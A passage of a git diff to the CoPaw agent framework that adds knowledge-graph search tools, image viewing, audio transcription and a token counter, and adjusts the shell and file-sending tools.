text="Knowledge retrieval is disabled in agent runtime configuration.", + ), + ], + ) + + limit = max(1, min(int(max_results), 20)) + threshold = float(min_score) + manager = KnowledgeManager(WORKING_DIR) + result = manager.search( + query=query_text, + config=config.knowledge, + limit=limit, + source_types=source_types, + ) + hits = [ + hit + for hit in (result.get("hits") or []) + if float(hit.get("score", 0) or 0) >= threshold + ] + + if not hits: + return ToolResponse( + content=[ + TextBlock( + type="text", + text="No relevant knowledge found.", + ), + ], + ) + + lines: list[str] = [f"Knowledge search results for: {query_text}", ""] + for index, hit in enumerate(hits, start=1): + source_name = hit.get("source_name") or "unknown" + source_type = hit.get("source_type") or "unknown" + score = float(hit.get("score", 0) or 0) + title = hit.get("document_title") or "(untitled)" + path = hit.get("document_path") or "" + snippet = (hit.get("snippet") or "").strip() + + lines.append( + f"[{index}] {source_name} ({source_type}) score={score:.2f}", + ) + lines.append(f"title: {title}") + if path: + lines.append(f"path: {path}") + if snippet: + lines.append(f"snippet: {snippet}") + lines.append("") + + return ToolResponse( + content=[TextBlock(type="text", text="\n".join(lines).strip())], + ) + except Exception as e: + return ToolResponse( + content=[ + TextBlock( + type="text", + text=f"Error: knowledge search failed due to\n{e}", + ), + ], + ) diff --git a/src/copaw/agents/tools/memify_run.py b/src/copaw/agents/tools/memify_run.py new file mode 100644 index 000000000..7f4a4d86b --- /dev/null +++ b/src/copaw/agents/tools/memify_run.py @@ -0,0 +1,78 @@ +# -*- coding: utf-8 -*- +"""Tool to trigger memify enrichment jobs.""" + +from __future__ import annotations + +import json + +from agentscope.message import TextBlock +from agentscope.tool import ToolResponse + +from ...config import load_config +from ...constant import WORKING_DIR +from ...knowledge.graph_ops import GraphOpsManager + +_PIPELINE_WHITELIST = { + "default", + "coding_rules", + "triplet_embeddings", + "session_persistence", + "entity_consolidation", +} + + +async def memify_run( + pipeline_type: str = "default", + dataset_scope: list[str] | None = None, + idempotency_key: str = "", + dry_run: bool = False, +) -> ToolResponse: + """Trigger a memify enrichment job. + + Args: + pipeline_type: Pipeline type, defaults to "default". + dataset_scope: Optional dataset names/ids. + idempotency_key: Optional key to deduplicate repeated requests. + dry_run: Whether to run in dry-run mode. + """ + config = load_config() + if not getattr(config, "knowledge", None) or not config.knowledge.enabled: + return ToolResponse( + content=[TextBlock(type="text", text="Error: knowledge is disabled in configuration.")], + ) + if not bool(getattr(config.agents.running, "knowledge_enabled", True)): + return ToolResponse( + content=[TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration.")], + ) + if not bool(getattr(config.knowledge, "memify_enabled", False)): + return ToolResponse( + content=[TextBlock(type="text", text="Error: memify is disabled in configuration.")], + ) + + pipeline = (pipeline_type or "default").strip().lower() + if pipeline not in _PIPELINE_WHITELIST: + return ToolResponse( + content=[ + TextBlock( + type="text", + text="Error: pipeline_type is invalid or not allowed.", + ) + ], + ) + + try: + manager = GraphOpsManager(WORKING_DIR) + result = manager.run_memify( + config=config.knowledge, + pipeline_type=pipeline, + dataset_scope=dataset_scope, + idempotency_key=(idempotency_key or "").strip(), + dry_run=bool(dry_run), + ) + return ToolResponse( + content=[TextBlock(type="text", text=json.dumps(result, ensure_ascii=False, indent=2))], + ) + except Exception as e: + return ToolResponse( + content=[TextBlock(type="text", text=f"Error: memify run failed due to\n{e}")], + ) \ No newline at end of file diff --git a/src/copaw/agents/tools/memify_status.py b/src/copaw/agents/tools/memify_status.py new file mode 100644 index 000000000..77e0b9ec6 --- /dev/null +++ b/src/copaw/agents/tools/memify_status.py @@ -0,0 +1,51 @@ +# -*- coding: utf-8 -*- +"""Tool to query memify enrichment job status.""" + +from __future__ import annotations + +import json + +from agentscope.message import TextBlock +from agentscope.tool import ToolResponse + +from ...config import load_config +from ...constant import WORKING_DIR +from ...knowledge.graph_ops import GraphOpsManager + + +async def memify_status(job_id: str) -> ToolResponse: + """Get memify job status by job id.""" + normalized_job_id = (job_id or "").strip() + if not normalized_job_id: + return ToolResponse( + content=[TextBlock(type="text", text="Error: job_id cannot be empty.")], + ) + + config = load_config() + if not getattr(config, "knowledge", None) or not config.knowledge.enabled: + return ToolResponse( + content=[TextBlock(type="text", text="Error: knowledge is disabled in configuration.")], + ) + if not bool(getattr(config.agents.running, "knowledge_enabled", True)): + return ToolResponse( + content=[TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration.")], + ) + if not bool(getattr(config.knowledge, "memify_enabled", False)): + return ToolResponse( + content=[TextBlock(type="text", text="Error: memify is disabled in configuration.")], + ) + + try: + manager = GraphOpsManager(WORKING_DIR) + result = manager.get_memify_status(normalized_job_id) + if result is None: + return ToolResponse( + content=[TextBlock(type="text", text="Error: memify job not found.")], + ) + return ToolResponse( + content=[TextBlock(type="text", text=json.dumps(result, ensure_ascii=False, indent=2))], + ) + except Exception as e: + return ToolResponse( + content=[TextBlock(type="text", text=f"Error: memify status failed due to\n{e}")], + ) \ No newline at end of file diff --git a/src/copaw/agents/tools/send_file.py b/src/copaw/agents/tools/send_file.py index c6fb13773..e48a8b52a 100644 --- a/src/copaw/agents/tools/send_file.py +++ b/src/copaw/agents/tools/send_file.py @@ -4,7 +4,6 @@ import os import mimetypes import unicodedata -from pathlib import Path from agentscope.tool import ToolResponse from agentscope.message import ( @@ -15,24 +14,6 @@ ) from ..schema import FileBlock -from ...constant import WORKING_DIR - -# Only allow files under this directory, mirroring message_processing.py -_ALLOWED_MEDIA_ROOT = WORKING_DIR / "media" - - -def _is_allowed_media_path(path: str) -> bool: - """True if path is a file under _ALLOWED_MEDIA_ROOT. - - Returns False when the path is invalid, cannot be resolved, - is not a regular file, or lies outside the allowed media root. - """ - try: - resolved = Path(path).expanduser().resolve() - root = _ALLOWED_MEDIA_ROOT.resolve() - return resolved.is_file() and resolved.is_relative_to(root) - except Exception: - return False def _auto_as_type(mt: str) -> str: @@ -50,13 +31,9 @@ async def send_file_to_user( ) -> ToolResponse: """Send a file to the user. - The file must be located inside the allowed media directory - (``/media``). Attempting to send a file from outside that - directory will return an error so that the agent is aware of the failure. - Args: file_path (`str`): - Path to the file to send. Must be inside the media directory. + Path to the file to send. Returns: `ToolResponse`: @@ -98,17 +75,6 @@ async def send_file_to_user( try: # Use local file URL instead of base64 absolute_path = os.path.abspath(file_path) - - if not _is_allowed_media_path(absolute_path): - return ToolResponse( - content=[ - TextBlock( - type="text", - text=f"Error: Media file outside allowed directory: {os.path.basename(file_path)}", - ), - ], - ) - file_url = f"file://{absolute_path}" source = {"type": "url", "url": file_url} diff --git a/src/copaw/agents/tools/shell.py b/src/copaw/agents/tools/shell.py index dc1a4f111..aca24b719 100644 --- a/src/copaw/agents/tools/shell.py +++ b/src/copaw/agents/tools/shell.py @@ -14,7 +14,8 @@ from agentscope.message import TextBlock from agentscope.tool import ToolResponse -from copaw.constant import WORKING_DIR +from ...constant import WORKING_DIR +from ...config.context import get_current_workspace_dir from .utils import truncate_shell_output @@ -68,9 +69,14 @@ def _execute_subprocess_sync( return code will be -1 and stderr will contain timeout information. """ try: + # Disable cmd.exe AutoRun (/D) to prevent spurious stderr + # from registry-configured startup scripts (e.g. "The system + # cannot find the path specified."). /S prevents quote stripping + # so the inner command is passed through unchanged. + wrapped = ["cmd", "/D", "/S", "/C", cmd] with subprocess.Popen( - cmd, - shell=True, + wrapped, + shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=False, @@ -131,6 +137,8 @@ async def execute_shell_command( error within , and tags. + IMPORTANT: Always consider the operating system before choosing commands. + Args: command (`str`): The shell command to execute. @@ -151,7 +159,11 @@ async def execute_shell_command( cmd = (command or "").strip() # Set working directory - working_dir = cwd if cwd is not None else WORKING_DIR + # Use current workspace_dir from context, fallback to WORKING_DIR + if cwd is not None: + working_dir = cwd + else: + working_dir = get_current_workspace_dir() or WORKING_DIR # Ensure the venv Python is on PATH for subprocesses env = os.environ.copy() diff --git a/src/copaw/agents/tools/triplet_focus_search.py b/src/copaw/agents/tools/triplet_focus_search.py new file mode 100644 index 000000000..4f17a1cc3 --- /dev/null +++ b/src/copaw/agents/tools/triplet_focus_search.py @@ -0,0 +1,119 @@ +# -*- coding: utf-8 -*- +"""Tool for triplet-focused graph retrieval.""" + +from __future__ import annotations + +import json + +from agentscope.message import TextBlock +from agentscope.tool import ToolResponse + +from ...config import load_config +from ...constant import WORKING_DIR +from ...knowledge.graph_ops import GraphOpsManager + + +async def triplet_focus_search( + subject: str = "", + predicate: str = "", + object_text: str = "", + query_text: str = "", + dataset_scope: list[str] | None = None, + top_k: int = 10, + expand_hops: int = 1, +) -> ToolResponse: + """Search graph records and return triplet-focused structured payload.""" + s = (subject or "").strip() + p = (predicate or "").strip() + o = (object_text or "").strip() + q = (query_text or "").strip() + + if not any([s, p, o, q]): + return ToolResponse( + content=[ + TextBlock( + type="text", + text="Error: at least one of subject/predicate/object_text/query_text is required.", + ) + ], + ) + + config = load_config() + if not getattr(config, "knowledge", None) or not config.knowledge.enabled: + return ToolResponse( + content=[TextBlock(type="text", text="Error: knowledge is disabled in configuration.")], + ) + if not bool(getattr(config.agents.running, "knowledge_enabled", True)): + return ToolResponse( + content=[TextBlock(type="text", text="Error: knowledge is disabled in agent runtime configuration.")], + ) + if not bool(getattr(config.knowledge, "triplet_search_enabled", False)): + return ToolResponse( + content=[ + TextBlock( + type="text", + text="Error: triplet-focused search is disabled in configuration.", + ) + ], + ) + + effective_query = q or " ".join(item for item in [s, p, o] if item) + try: + manager = GraphOpsManager(WORKING_DIR) + base = manager.graph_query( + config=config.knowledge, + query_mode="template", + query_text=effective_query, + dataset_scope=dataset_scope, + top_k=max(1, min(int(top_k), 50)), + timeout_sec=20, + ) + + filtered_records: list[dict] = [] + for record in base.records: + rs = str(record.get("subject") or "") + rp = str(record.get("predicate") or "") + ro = str(record.get("object") or "") + if s and s.lower() not in rs.lower(): + continue + if p and p.lower() not in rp.lower(): + continue + if o and o.lower() not in ro.lower(): + continue + filtered_records.append(record) + + triplets = [ + { + "subject": item.get("subject"), + "predicate": item.get("predicate"), + "object": item.get("object"), + } + for item in filtered_records + ] + evidence = [ + { + "source_id": item.get("source_id"), + "source_type": item.get("source_type"), + "document_path": item.get("document_path"), + "document_title": item.get("document_title"), + } + for item in filtered_records + ] + scores = [float(item.get("score", 0) or 0) for item in filtered_records] + + payload = { + "triplets": triplets, + "evidence": evidence, + "scores": scores, + "context_summary": ( + f"Found {len(triplets)} triplets (expand_hops={max(1, int(expand_hops))})." + ), + "warnings": base.warnings, + } + return ToolResponse( + content=[TextBlock(type="text", text=json.dumps(payload, ensure_ascii=False, indent=2))], + ) + except Exception as e: + return ToolResponse( + content=[TextBlock(type="text", text=f"Error: triplet-focused search failed due to\n{e}")], + ) \ No newline at end of file diff --git a/src/copaw/agents/tools/view_image.py b/src/copaw/agents/tools/view_image.py new file mode 100644 index 000000000..577765231 --- /dev/null +++ b/src/copaw/agents/tools/view_image.py @@ -0,0 +1,81 @@ +# -*- coding: utf-8 -*- +"""Load an image file into the LLM context for visual analysis.""" + +import mimetypes +import os +import unicodedata +from pathlib import Path + +from agentscope.message import ImageBlock, TextBlock +from agentscope.tool import ToolResponse + +_IMAGE_EXTENSIONS = { + ".png", + ".jpg", + ".jpeg", + ".gif", + ".webp", + ".bmp", + ".tiff", + ".tif", +} + + +async def view_image(image_path: str) -> ToolResponse: + """Load an image file into the LLM context so the model can see it. + + Use this after desktop_screenshot, browser_use, or any tool that + produces an image file path. + + Args: + image_path (`str`): + Path to the image file to view. + + Returns: + `ToolResponse`: + An ImageBlock the model can inspect, or an error message. + """ + image_path = unicodedata.normalize( + "NFC", + os.path.expanduser(image_path), + ) + resolved = Path(image_path).resolve() + + if not resolved.exists() or not resolved.is_file(): + return ToolResponse( + content=[ + TextBlock( + type="text", + text=f"Error: {image_path} does not exist or " + "is not a file.", + ), + ], + ) + + ext = resolved.suffix.lower() + mime, _ = mimetypes.guess_type(str(resolved)) + if ext not in _IMAGE_EXTENSIONS and ( + not mime or not mime.startswith("image/") + ): + return ToolResponse( + content=[ + TextBlock( + type="text", + text=f"Error: {resolved.name} is not a supported " + "image format.", + ), + ], + ) + + return ToolResponse( + content=[ + ImageBlock( + type="image", + source={"type": "url", "url": str(resolved)}, + ), + TextBlock( + type="text", + text=f"Image loaded: {resolved.name}", + ), + ], + ) diff --git a/src/copaw/agents/utils/__init__.py b/src/copaw/agents/utils/__init__.py index 2a983500c..b82ab64e6 100644 --- a/src/copaw/agents/utils/__init__.py +++ b/src/copaw/agents/utils/__init__.py @@ -44,6 +44,8 @@ extract_tool_ids, ) +from .copaw_token_counter import _get_copaw_token_counter + __all__ = [ # File handling "download_file_from_base64", @@ -66,4 +68,5 @@ "_sanitize_tool_messages", "check_valid_messages", "extract_tool_ids", + "_get_copaw_token_counter", ] diff --git a/src/copaw/agents/utils/audio_transcription.py b/src/copaw/agents/utils/audio_transcription.py new file mode 100644 index 000000000..5ecdf8673 --- /dev/null +++ b/src/copaw/agents/utils/audio_transcription.py @@ -0,0 +1,317 @@ +# -*- coding: utf-8 -*- +"""Audio transcription utility. + +Transcribes audio files to text using either: +- An OpenAI-compatible ``/v1/audio/transcriptions`` endpoint (Whisper API), or +- The locally installed ``openai-whisper`` Python library (Local Whisper). + +Transcription is only attempted when explicitly enabled via the +``transcription_provider_type`` config setting. The default is ``"disabled"``. +""" + +import asyncio +import logging +import shutil +import threading +from typing import List, Optional, Tuple + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------ +# Cached local-whisper model (lazy singleton) +# ------------------------------------------------------------------ +_local_whisper_model = None +_local_whisper_lock = threading.Lock() + + +def _get_local_whisper_model(): + """Return a cached whisper model, loading it on first call.""" + global _local_whisper_model # noqa: PLW0603 + if _local_whisper_model is not None: + return _local_whisper_model + with _local_whisper_lock: + if _local_whisper_model is not None: + return _local_whisper_model + import whisper + + _local_whisper_model = whisper.load_model("base") + return _local_whisper_model + + +# ------------------------------------------------------------------ +# Provider helpers +# ------------------------------------------------------------------ + + +def _url_for_provider(provider) -> Optional[Tuple[str, str]]: + """Return ``(base_url, api_key)`` if *provider* can serve transcription. + + Supports providers that do not require an API key (e.g. local Ollama). + """ + from ...providers.openai_provider import OpenAIProvider + from ...providers.ollama_provider import OllamaProvider + + if isinstance(provider, OpenAIProvider): + requires_key = getattr(provider, "require_api_key", True) + key = provider.api_key or "" + if requires_key and not key: + return None + base = provider.base_url.rstrip("/") + if not base.endswith("/v1"): + base += "/v1" + return (base, key or "") + if isinstance(provider, OllamaProvider): + base = provider.base_url.rstrip("/") + if not base.endswith("/v1"): + base += "/v1" + return (base, provider.api_key or "") + return None + + +def _get_manager(): + """Return ProviderManager singleton or None.""" + try: + from ...providers.provider_manager import ProviderManager + + return ProviderManager.get_instance() + except Exception: + logger.debug("ProviderManager not initialised yet") + return None + + +# ------------------------------------------------------------------ +# Public helpers for API / Console UI +# ------------------------------------------------------------------ + + +def list_transcription_providers() -> List[dict]: + """Return providers capable of audio transcription. + + Each entry is ``{"id": ..., "name": ..., "available": bool}``. + Availability is based on whether the provider has usable credentials. + """ + manager = _get_manager() + if manager is None: + return [] + + results: list[dict] = [] + all_providers = { + **getattr(manager, "builtin_providers", {}), + **getattr(manager, "custom_providers", {}), + } + for provider in all_providers.values(): + creds = _url_for_provider(provider) + if creds is not None: + results.append( + { + "id": provider.id, + "name": provider.name, + "available": True, + }, + ) + return results + + +def get_configured_transcription_provider_id() -> str: + """Return the explicitly configured provider ID (raw config value).""" + from ...config import load_config + + return load_config().agents.transcription_provider_id + + +def check_local_whisper_available() -> dict: + """Check whether the local whisper provider can be used. + + Returns a dict with:: + + { + "available": bool, + "ffmpeg_installed": bool, + "whisper_installed": bool, + } + """ + ffmpeg_ok = shutil.which("ffmpeg") is not None + + whisper_ok = False + try: + import whisper as _whisper # noqa: F401 + + whisper_ok = True + except ImportError: + pass + + return { + "available": ffmpeg_ok and whisper_ok, + "ffmpeg_installed": ffmpeg_ok, + "whisper_installed": whisper_ok, + } + + +# ------------------------------------------------------------------ +# Transcription backends +# ------------------------------------------------------------------ + + +async def _transcribe_local_whisper(file_path: str) -> Optional[str]: + """Transcribe using the locally installed ``openai-whisper`` library. + + Requires both ``ffmpeg`` and ``openai-whisper`` to be installed. + Returns the transcribed text, or ``None`` on failure. + """ + status = check_local_whisper_available() + if not status["available"]: + missing = [] + if not status["ffmpeg_installed"]: + missing.append("ffmpeg") + if not status["whisper_installed"]: + missing.append("openai-whisper") + logger.warning( + "Local Whisper unavailable (missing: %s). " + "Install the missing dependencies to use local transcription.", + ", ".join(missing), + ) + return None + + def _run(): + model = _get_local_whisper_model() + result = model.transcribe(file_path) + return (result.get("text") or "").strip() + + try: + text = await asyncio.to_thread(_run) + if text: + logger.debug( + "Local Whisper transcribed %s: %s", + file_path, + text[:80], + ) + return text + logger.warning( + "Local Whisper returned empty text for %s", + file_path, + ) + return None + except Exception: + logger.warning( + "Local Whisper transcription failed for %s", + file_path, + exc_info=True, + ) + return None + + +def _get_configured_provider_creds() -> Optional[Tuple[str, str]]: + """Return ``(base_url, api_key)`` for the explicitly configured provider. + + Returns ``None`` when no provider is configured or the configured + provider is not found / has no usable credentials. + """ + from ...config import load_config + + configured_id = load_config().agents.transcription_provider_id + if not configured_id: + return None + + manager = _get_manager() + if manager is None: + return None + + provider = manager.get_provider(configured_id) + if provider is None: + logger.warning( + "Configured transcription provider '%s' not found", + configured_id, + ) + return None + + creds = _url_for_provider(provider) + if creds is None: + logger.warning( + "Configured transcription provider '%s' has no usable credentials", + configured_id, + ) + return creds + + +async def _transcribe_whisper_api(file_path: str) -> Optional[str]: + """Transcribe using the OpenAI-compatible Whisper API endpoint. + + Only uses the explicitly configured provider — no auto-detection. + Returns the transcribed text, or ``None`` on failure. + """ + creds = _get_configured_provider_creds() + if creds is None: + logger.warning( + "No transcription provider configured; skipping transcription", + ) + return None + + base_url, api_key = creds + + try: + from openai import AsyncOpenAI + except ImportError: + logger.warning( + "openai package not installed; cannot transcribe audio", + ) + return None + + from ...config import load_config + + model_name = load_config().agents.transcription_model or "whisper-1" + + client = AsyncOpenAI( + base_url=base_url, + api_key=api_key or "none", + timeout=60, + ) + + try: + with open(file_path, "rb") as f: + transcript = await client.audio.transcriptions.create( + model=model_name, + file=f, + ) + text = transcript.text.strip() + if text: + logger.debug("Transcribed audio %s: %s", file_path, text[:80]) + return text + logger.warning("Transcription returned empty text for %s", file_path) + return None + except Exception: + logger.warning( + "Audio transcription failed for %s", + file_path, + exc_info=True, + ) + return None + + +# ------------------------------------------------------------------ +# Public entry point +# ------------------------------------------------------------------ + + +async def transcribe_audio(file_path: str) -> Optional[str]: + """Transcribe an audio file to text. + + Dispatches to either the Whisper API or local Whisper based on the + ``transcription_provider_type`` config setting. When the setting is + ``"disabled"`` (the default), returns ``None`` immediately. + + Returns the transcribed text, or ``None`` on failure. + """ + from ...config import load_config + + provider_type = load_config().agents.transcription_provider_type + + if provider_type == "disabled": + logger.debug("Transcription is disabled; skipping") + return None + if provider_type == "local_whisper": + return await _transcribe_local_whisper(file_path) + if provider_type == "whisper_api": + return await _transcribe_whisper_api(file_path) + + logger.warning("Unknown transcription_provider_type: %s", provider_type) + return None diff --git a/src/copaw/agents/utils/copaw_token_counter.py b/src/copaw/agents/utils/copaw_token_counter.py new file mode 100644 index 000000000..5a1b1b69a --- /dev/null +++ b/src/copaw/agents/utils/copaw_token_counter.py @@ -0,0 +1,192 @@ +# -*- coding: utf-8 -*- +"""Token counting utilities for CoPaw using HuggingFace tokenizers. + +This module provides a configurable token counter that supports dynamic +switching between different tokenizer models based on runtime configuration. +""" +import logging +import os +from pathlib import Path +from typing import Any, TYPE_CHECKING + +from agentscope.token import HuggingFaceTokenCounter + +if TYPE_CHECKING: + from copaw.config.config import AgentProfileConfig + +logger = logging.getLogger(__name__) + + +class CopawTokenCounter(HuggingFaceTokenCounter): + """Token counter for CoPaw with configurable tokenizer support. + + This class extends HuggingFaceTokenCounter to provide token counting + functionality with support for both local and remote tokenizers, + as well as HuggingFace mirror for users in China. + + Attributes: + token_count_model: The tokenizer model path or "default" for + local tokenizer. + token_count_use_mirror: Whether to use HuggingFace mirror. + token_count_estimate_divisor: Divisor for character-based token + estimation. + """ + + def __init__( + self, + token_count_model: str, + token_count_use_mirror: bool, + token_count_estimate_divisor: float = 3.75, + **kwargs, + ): + """Initialize the token counter with the specified configuration. + + Args: + token_count_model: The tokenizer model path. Use "default" + for the bundled local tokenizer, or provide a HuggingFace + model identifier or path to a custom tokenizer. + token_count_use_mirror: Whether to use the HuggingFace mirror + (https://hf-mirror.com) for downloading tokenizers. + Useful for users in China. + token_count_estimate_divisor: Divisor for character-based token + estimation (default: 3.75). + **kwargs: Additional keyword arguments passed to + HuggingFaceTokenCounter. + """ + self.token_count_model = token_count_model + self.token_count_use_mirror = token_count_use_mirror + self.token_count_estimate_divisor = token_count_estimate_divisor + + # Set HuggingFace endpoint for mirror support + if token_count_use_mirror: + os.environ["HF_ENDPOINT"] = "https://hf-mirror.com" + else: + os.environ.pop("HF_ENDPOINT", None) + + # Resolve tokenizer path + if token_count_model == "default": + tokenizer_path = str( + Path(__file__).parent.parent.parent / "tokenizer", + ) + else: + tokenizer_path = token_count_model + + try: + super().__init__( + pretrained_model_name_or_path=tokenizer_path, + use_mirror=token_count_use_mirror, + use_fast=True, + trust_remote_code=True, + **kwargs, + ) + self._tokenizer_available = True + + except Exception as e: + logger.exception("Failed to initialize tokenizer: %s", e) + self._tokenizer_available = False + + async def count( + self, + messages: list[dict], + tools: list[dict] | None = None, + text: str | None = None, + **kwargs: Any, + ) -> int: + """Count tokens in messages or text. + + If text is provided, counts tokens directly in the text string. + Otherwise, counts tokens in the messages using the parent class method. + + Args: + messages: List of message dictionaries in chat format. + tools: Optional list of tool definitions for token counting. + text: Optional text string to count tokens directly. + **kwargs: Additional keyword arguments passed to parent + count method. + + Returns: + The number of tokens, guaranteed to be at least the + estimated minimum. + """ + if text: + if self._tokenizer_available: + try: + token_ids = self.tokenizer.encode(text) + return max(len(token_ids), self.estimate_tokens(text)) + except Exception as e: + logger.exception( + "Failed to encode text with tokenizer: %s", + e, + ) + return self.estimate_tokens(text) + else: + return self.estimate_tokens(text) + else: + return await super().count(messages, tools, **kwargs) + + def estimate_tokens(self, text: str) -> int: + """Estimate the number of tokens in a text string. + + Provides a fast character-based estimation as a fallback + or lower bound. Uses the configured divisor from agent settings. + + Args: + text: The text string to estimate tokens for. + + Returns: + The estimated number of tokens in the text string. + """ + return int( + len(text.encode("utf-8")) / self.token_count_estimate_divisor + + 0.5, + ) + + +# Global token counter instance cache (keyed by configuration tuple) +_token_counter_cache: dict[tuple, CopawTokenCounter] = {} + + +def _get_copaw_token_counter( + agent_config: "AgentProfileConfig", +) -> CopawTokenCounter: + """Get or create a token counter instance for the given agent conf. + + This function implements a cache based on token counter configuration. + If a token counter with the same configuration already exists, it will be + reused. Otherwise, a new instance will be created. + + Args: + agent_config: Agent profile configuration containing running + settings including token_count_model, token_count_use_mirror, + and token_count_estimate_divisor. + + Returns: + CopawTokenCounter: A token counter instance for the given + configuration. + + Note: + Token counters are cached by their configuration tuple to enable + reuse across agents with identical settings. + """ + running_config = agent_config.running + config_key = ( + running_config.token_count_model, + running_config.token_count_use_mirror, + running_config.token_count_estimate_divisor, + ) + + if config_key not in _token_counter_cache: + _token_counter_cache[config_key] = CopawTokenCounter( + token_count_model=running_config.token_count_model, + token_count_use_mirror=running_config.token_count_use_mirror, + token_count_estimate_divisor=( + running_config.token_count_estimate_divisor + ), + ) + logger.debug( + "Token counter created with model=%s, mirror=%s, divisor=%s", + running_config.token_count_model, + running_config.token_count_use_mirror, + running_config.token_count_estimate_divisor, + ) + return _token_counter_cache[config_key] diff --git a/src/copaw/agents/utils/message_processing.py b/src/copaw/agents/utils/message_processing.py index a1c7ec37b..1eb0a651c 100644 --- a/src/copaw/agents/utils/message_processing.py +++ b/src/copaw/agents/utils/message_processing.py @@ -6,6 +6,7 @@ - Message content manipulation - Message validation """ +import asyncio import logging import os import urllib.parse @@ -21,16 +22,23 @@ logger = logging.getLogger(__name__) -# Only allow local paths under this dir (channels save media here). -_ALLOWED_MEDIA_ROOT = WORKING_DIR / "media" +# Trusted directories where channels save downloaded media. +_ALLOWED_MEDIA_ROOTS = [ + WORKING_DIR / "media", + WORKING_DIR / "downloads", +] def _is_allowed_media_path(path: str) -> bool: - """True if path is a file under _ALLOWED_MEDIA_ROOT.""" + """True if *path* is a file under one of the allowed media directories.""" try: resolved = Path(path).expanduser().resolve() - root = _ALLOWED_MEDIA_ROOT.resolve() - return resolved.is_file() and resolved.is_relative_to(root) + if not resolved.is_file(): + return False + return any( + resolved.is_relative_to(root.resolve()) + for root in _ALLOWED_MEDIA_ROOTS + ) except Exception: return False @@ -118,9 +126,84 @@ def _media_type_from_path(path: str) -> str: ".wav": "audio/wav", ".mp3": "audio/mp3", ".opus": "audio/opus", + ".ogg": "audio/ogg", + ".flac": "audio/flac", + ".m4a": "audio/mp4", + ".aac": "audio/aac", }.get(ext, "audio/octet-stream") +# Extensions accepted by the agentscope OpenAIChatFormatter +_FORMATTER_SUPPORTED_AUDIO_EXTS = {".wav", ".mp3"} + + +def _convert_audio_to_wav(src_path: str) -> Optional[str]: + """Convert an audio file to .wav using ffmpeg if the extension is not + natively supported by the LLM formatter. + + Uses a unique temporary file name to avoid overwriting existing files. + + Returns the path to the converted .wav file, or None if conversion + failed or was not needed. + """ + ext = (os.path.splitext(src_path)[1] or "").lower() + if ext in _FORMATTER_SUPPORTED_AUDIO_EXTS: + return None # already supported, no conversion needed + + import subprocess + import shutil + import tempfile + + if not shutil.which("ffmpeg"): + logger.warning( + "ffmpeg not found; cannot convert %s audio to wav. " + "Install ffmpeg to enable audio format conversion.", + ext, + ) + return None + + # Use a temp file in the same directory to avoid clobbering. + src_dir = os.path.dirname(src_path) or "." + fd, dst_path = tempfile.mkstemp(suffix=".wav", dir=src_dir) + os.close(fd) + try: + subprocess.run( + [ + "ffmpeg", + "-y", + "-loglevel", + "error", + "-i", + src_path, + "-ar", + "16000", + "-ac", + "1", + dst_path, + ], + stdout=subprocess.DEVNULL, + stderr=subprocess.PIPE, + timeout=30, + check=True, + ) + logger.debug("Converted audio %s -> %s", src_path, dst_path) + return dst_path + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as e: + stderr = getattr(e, "stderr", b"") or b"" + logger.warning( + "Audio conversion failed for %s: %s\nffmpeg stderr: %s", + src_path, + e, + stderr.decode(errors="replace"), + ) + # Clean up the temp file on failure. + try: + os.unlink(dst_path) + except OSError: + pass + return None + + def _update_block_with_local_path( block: dict, block_type: str, @@ -157,6 +240,93 @@ def _handle_download_failure(block_type: str) -> Optional[dict]: return None +async def _process_audio_block( + message_content: list, + index: int, + local_path: str, + block: dict, +) -> bool: + """Handle an audio block according to the configured audio_mode. + + Modes: + - ``"auto"`` (default): try transcription; if it succeeds, replace + the audio block with the transcribed text and suppress file + metadata. If transcription fails (no provider, missing deps, + API error), show a file-uploaded placeholder instead. Audio is + never sent directly to the model in this mode. + - ``"native"``: send the audio block directly to the model + (convert via ffmpeg if needed). No transcription is attempted. + If the file format is unsupported and conversion fails, a text + placeholder is shown instead. + + Returns: + True if the audio was fully handled (transcribed or sent natively) + — the "file downloaded" notification will be suppressed. + False if transcription failed — the notification is kept so the + LLM knows the file path. + """ + # Security: reject paths outside the allowed media directory. + if not _is_allowed_media_path(local_path): + logger.warning( + "Audio path outside allowed media dir, rejecting: %s", + local_path, + ) + message_content[index] = { + "type": "text", + "text": "[Voice message]: (audio file rejected)", + } + return True + + from .audio_transcription import transcribe_audio + + audio_mode = load_config().agents.audio_mode + + if audio_mode == "native": + converted = await asyncio.to_thread( + _convert_audio_to_wav, + local_path, + ) + ext = (os.path.splitext(local_path)[1] or "").lower() + if converted: + audio_path = converted + elif ext in _FORMATTER_SUPPORTED_AUDIO_EXTS: + # Already a supported format, no conversion needed. + audio_path = local_path + else: + # Unsupported format and conversion failed — show placeholder + # instead of sending an unsupported audio block to the model. + message_content[index] = { + "type": "text", + "text": ( + "[Voice message]: (audio conversion failed, " + "install ffmpeg to enable native audio)" + ), + } + return True + block["source"] = { + "type": "url", + "url": Path(audio_path).as_uri(), + "media_type": _media_type_from_path(audio_path), + } + return True + + # "auto": attempt transcription. + text = await transcribe_audio(local_path) + if text: + message_content[index] = { + "type": "text", + "text": f"[Voice message]: {text}", + } + return True + + # Transcription failed — show file-uploaded placeholder. + message_content[index] = { + "type": "text", + "text": "[Voice message]: (audio file received)", + } + return False + + async def _process_single_block( message_content: list, index: int, @@ -201,11 +371,26 @@ async def _process_single_block( local_path = await _process_single_file_block(source, filename) if local_path: - message_content[index] = _update_block_with_local_path( - block, - block_type, - local_path, - ) + if block_type == "audio": + # Audio blocks need transcription or format conversion + # depending on the configured audio_mode. + _update_block_with_local_path(block, block_type, local_path) + handled = await _process_audio_block( + message_content, + index, + local_path, + block, + ) + if handled: + # Audio was transcribed or sent natively; suppress the + # "file downloaded" notification that would follow. + return None + else: + message_content[index] = _update_block_with_local_path( + block, + block_type, + local_path, + ) logger.debug( "Updated %s block with local path: %s", block_type, diff --git a/src/copaw/agents/utils/setup_utils.py b/src/copaw/agents/utils/setup_utils.py index f9b584c28..4caf82b0d 100644 --- a/src/copaw/agents/utils/setup_utils.py +++ b/src/copaw/agents/utils/setup_utils.py @@ -14,18 +14,23 @@ def copy_md_files( language: str, skip_existing: bool = False, + workspace_dir: Path | None = None, ) -> list[str]: """Copy md files from agents/md_files to working directory. Args: language: Language code (e.g. 'en', 'zh') skip_existing: If True, skip files that already exist in working dir. + workspace_dir: Target workspace directory. If None, uses WORKING_DIR. Returns: List of copied file names. """ from ...constant import 